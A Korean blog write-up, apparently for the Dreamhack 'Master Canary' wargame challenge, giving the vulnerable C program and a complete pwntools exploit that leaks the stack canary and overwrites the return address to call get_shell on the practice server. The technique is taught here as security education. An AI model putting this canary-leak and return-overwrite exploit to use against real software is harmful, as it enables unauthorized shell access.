Master Canary

🌇│System_Study/📕│Dreamhack_Hacking

Master Canary

Jastes 2022. 11. 13. 22:52

Master Canary

마스터 카나리를 스택 버퍼와 확인하는 법!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92 // gcc -o master master.c -pthread
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <pthread.h>
 
char *global_buffer;
 
void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}
 
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(60);
}
 
void get_shell() {
    system("/bin/sh");
}
 
void *thread_routine() {
    char buf[256];
 
    global_buffer = buf;
 
}
void read_bytes(char *buf, size_t size) {
    size_t sz = 0;
    size_t idx = 0;
    size_t tmp;
 
    while (sz < size) {
        tmp = read(0, &buf[idx], 1);
        if (tmp != 1) {
            exit(-1);
        }
        idx += 1;
        sz += 1;
    }
    return;
}
int main(int argc, char *argv[]) {
    size_t size;
    pthread_t thread_t;
    size_t idx;
    char leave_comment[32];
 
 
    initialize();
 
    while(1) {
        printf("1. Create thread\n");
        printf("2. Input\n");
        printf("3. Exit\n");
        printf("> ");
        scanf("%d", &idx);
 
        switch(idx) {
            case 1:
                if (pthread_create(&thread_t, NULL, thread_routine, NULL) < 0)
                {
                    perror("thread create error");
                    exit(0);
                }
                break;
            case 2:
                printf("Size: ");
                scanf("%d", &size);
 
                printf("Data: ");
                read_bytes(global_buffer, size);
 
                printf("Data: %s", global_buffer);
                break;
            case 3:
                printf("Leave comment: ");
                read(0, leave_comment, 1024);
                return 0;
            default:
                printf("Nope\n");
                break;
        }
    }
    
 
    return 0;
}
Colored by Color Scripter cs

위 코드가 핵심인듯 싶으며, 보시면..
1번 옵션으로 쓰레드를 생성/2번은 size를 입력 해당 입력 size만큼 입력을 받네요
즉, bof가 발생되겠죠? 마지막은 read 함수로 1024바이트만큼 입력 받기

Master canary를 이용할 것이기에(Partial RELRO, Canary)를 우회가 가능합니다.
또한 위에 get_shell()의 함수가 존재하므로 NX도 우회가 가능합니다.

마스터 카나리는 로더에서 할당한 TLS 영역에 존재하고, 해당 페이지는 RW-로 존재합니다.
해당 영역을 이해하기 위해서는 아래 링크에 대하여 자세히 알 필요가 있습니다.

대충 시나리오를 설계하자면.. 1번으로 쓰레드 생성 그 이유
2번으로 master canary leak / 3번으로 ret overwrite(get_shell을 이용하여)
이전처럼 ret와 master canary의 거리를 구한 후 실행하면 되겠네요.. 코드도 유사해서 ㅎ

위에 참고로 buf가 있기에 그 함수를 활용하여 구해봅시다.
dreamhack이 초보자를 위해서 참 코드를 잘 작성해주네요 ㅎ

주석으로 global_buffer라고 나온 바로 밑에 부분을 프보를 걸어줍니다.
바로 밑에 canary의 시그니처가 있기에 ret값을 구하는데 좋겠죠?

근데 프보를 걸어서 하는 방식도 있지만 여기선 저는 global_buffer를 활용하여 아래처럼..

저렇게하면 뭔가 실행이 잘 안되네요

그럼 전에처럼 rbp-0x110와 fs_base+0x28의 offset을 구하면 되겠죠?

그럼 서로의 거리가 0x928이므로 이전의 코드의 형식처럼 작성한다면..

일반적으론 마스터 카나리는 스택에 존재X로 BOF가 발생해도 Exploit이 불가능하지만..
쓰레드 스택의 경우는 예외적으로 쓰레드 스택에 마스터 카나리가 들어간다.

근데 아무리 마스터 카나리를 해도 안되서 구글링을 좀 해보니까 다른 마스터 카나리를 사용하기에
그냥 카나리 릭을 하라고 하시길래 위와 같이 하였습니다.

Exploit Tech: Return to Shellcode

Return Address OverWrite 카나리 우회와 셸 코드를 이용해 셸을 획득하는 방법 HTML 삽입 미리보기할 수 없는 소스 보호기법 리눅스에는 다양한 바이너리 보호기법이 존재합니다. 적용된 보호기법에 따

dystopia050119.tistory.com

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65 from pwn import *
import sys
 
def main():
    FILENAME = './master_canary'
    HOST = 'host3.dreamhack.games'
 
    if(args['REMOTE']):
        p = remote(HOST, sys.argv[1])
    else:
        p = process(FILENAME)
 
    '''default Setting'''
    e = ELF(FILENAME, checksec=False)
    context(arch='amd64', os='linux', endian='little')
    context.log_level = 'debug'
    #context.cyclic_alphabet = 'ABC'
 
    get_shell = e.symbols['get_shell']
 
    '''payload script(buf-canary-sfp-ret)'''
    #payload = b'A'*0x110
    payload = b'A'*0x8e9 #Ubuntu 16.04 + printf func if print is \x00, so +1
    #payload += b'AAAAAAAA'   #canary 
 
    p.sendlineafter('> ', '1')
    p.sendlineafter('> ', '2')
    
    inp_sz = len(payload)
    p.sendlineafter('Size: ', str(inp_sz))
 
    '''
    #fail solve#
    p.sendlineafter('Size: ', str(inp_sz))
    p.sendlineafter('Data: ', payload)
    p.recvuntil('A'* inp_sz)
    payload += b'B'*0x8
    payload += p64(get_shell)
    #ret overwrite#
    #payload += cyclic(0x928-len(payload))
    payload += b'A'*(0x928-len(payload))
    payload += b'AAAAAAAA' #master canary
    '''
    
    canary = u64(p.recvn(7).rjust(8, b'\x00'))
    log.info(f'canary addr : {hex(canary)}')
 
    #RET Overwrite
    payload = b'A'*0x28
    payload += p64(canary)
    payload += b'B' * 0x8
    payload += p64(get_shell)
    
    #p.sendlineafter('Size: ', str(len(payload)))
    #p.sendlineafter('Data: ', payload)
 
    p.sendlineafter('> ', '3')
    p.sendlineafter('Leave comment: ', payload)
 
    p.interactive()
 
if __name__=="__main__":
    main()
Colored by Color Scripter cs

이 부분이 핵심으로 나머지 위에 코드는 취향차이이므로 넘어가도록 합시다.
위에 canary leak을 할 때처럼 rbp-0x114가 총 버퍼의 크기이며, 나머지는 위에 설명에서처럼 하면..
짜란! 끝이 나게됩니다.

buf와 master canary의 사이값이고요(환경 이슈가 있어서 환경만 도커로 하시고 하면 똑같아요)
printf는 \x00을 받으면 출력하기에 씹어주기 위해 넣으시고..

canary를 받은 모습이며, ret의 값을 변조하기위해(master canary)로 접근했기에
해당 카나리 값을 우리가 아까 받았던 부분으로 넣으면 master canary가 다른 곳에서 받은
곳이라도 어짜피 우리가 사용할 마스터 카나리도 똑같이 변조 ret로 우회하면..

master canary leak을 이용한 부분이라고 할 수 있습니다!!

참고 자료

참고 이미지

저작자표시 비영리 변경금지